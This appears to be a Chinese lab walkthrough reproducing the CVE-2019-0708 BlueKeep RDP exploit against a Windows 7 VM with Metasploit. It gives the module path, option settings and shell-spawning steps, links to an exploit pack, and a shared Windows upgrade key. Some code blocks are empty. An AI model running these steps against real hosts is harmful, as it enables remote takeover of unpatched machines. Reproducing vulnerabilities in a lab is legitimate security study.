CVE-2019-0708 RDP MSF漏洞复现
漏洞环境
使用 VMware 安装Windows7 X64 模拟受害机
Windows7 X64下载链接:链接: https://pan.baidu/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx
EXP
kali msf 攻击准备:
1,metasploit-framework, kali msf 需更新到最新版本,如果正常打开输入:msfupdate 进行更新,如果启动msf报错,可以卸载重新安装:
1 |
|
2,MSF 下载 Reference 中的攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可) 。
链接: https://pan.baidu/s/1m1N0RLBhLRTMLy56DFke-g 提取码: kw7b
1 2 3 4 |
|
window7 X64 攻击准备:
1,如果下载到的Win7 X64是家庭普通版,是需要升级到旗舰版或者专业版,因为家庭普通版是没有远程连接这个功能的。
点击开始,找到Windows Anytime Upgrade
这里输入密钥:6K2KY-BFH24-PJW6W-9GK29-TMPWP
下一步 ,验证密钥,等待验证密钥。如果密钥验证成功,会出现请接受许可条款,如果密钥验证不成功,则下面的步骤不可用,那可以返回,重新在网上找升级密钥,直至密钥验证成功。点我接受,升级系统大概花10分钟的时间,联网升级,在升级过程中,电脑会重启数次,认真等待。
2,开启3389端口,允许远程桌面连接;修改高级共享设置,默认是关闭的;
启动远程桌面服务,默认是禁止的;
修改防火墙设置,增加一条允许连接tcp 3389端口的出站入站记录;
这样就可以开启远程连接了,一般是允许远程桌面连接和启动远程桌面服务就可以了,如果仍然不行的话就把上面的准备全部操作一遍。
进行攻击:
使用 msfconsole 进入 metasploit-framework
进入以后使用 reload_all 重新加载 0708rdp 利用模块
使用 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 启用 0708RDP 攻击模块
使用 show options 查看相关信息和设置
关键设置主要为 RHOSTS / RPORT / target
set RHOSTS 受害机IP设置受害机IP
set RPORT 受害机PORT设置受害机RDP端口号
set target ID数字(可选为0-4)设置受害机机器架构
使用的是VMware,那么 target 2 满足条件
使用 exploit 开始攻击,等待建立连接
建立连接以后,使用 shell
获得shell,再使用 python
获得交互式 shell
完成攻击,成功拿到受害者主机权限。
发布评论